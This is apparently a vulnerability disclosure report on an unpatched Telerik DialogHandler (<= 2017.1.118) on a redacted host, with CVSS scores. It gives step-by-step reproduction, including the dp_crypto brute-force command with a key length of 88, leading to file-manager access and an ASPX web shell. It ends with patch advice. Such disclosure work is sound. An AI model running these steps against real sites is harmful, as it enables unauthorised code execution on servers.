9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.587 Medium
EPSS
Percentile
97.2%
Summary:
https://█████████/ is hosting an unpatched version of the Telerik DialogHandler Telerik.Web.UI.DialogHandler.aspx allowing for the machine key to be brute forced. The machine key can be used to access the DNN file manager to upload arbitrary files including ASPX giving a web shell and RCE.
Description:
Telerik has a known cryptographic weakness in older versions of the Dialog Handler which when exploited can be used to brute force the machine key and gain access to the DNN file manager. The file manager allows for ASPX shell upload and RCE.
Step-by-step Reproduction Instructions
Hit https://███/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx and notice the handler dialog message.
Download https://github.com/bao7uo/dp_crypto to make brute force simple and run:
python dp_crypto.py -k https://███████/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx 88 all 21
Wait for the script to finish and the key will be integrated into a link to the file manager for DNN.
You can use this link to upload arbitrary files to DNN. I uploaded a PNG for proof but ASPX works just as well here. I had to do a little trial and error on this one, it uses the ASCII character set and figuring out a key length of 88 took a little doing but going longer than the real key causes the base64 to start validating again from the beginning so in a test of 128 key length I was able to see the key repeat at the 89th position.
Product, Version, and Configuration (If applicable)
Telerik <= 2017.1.118
Suggested Mitigation/Remediation Actions
Patch Telerik or switch to a different editor like CKEditor.
Critical: Exploitation allows for a web shell, defacement, etc through arbitrary unrestricted file uploads.
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.587 Medium
EPSS
Percentile
97.2%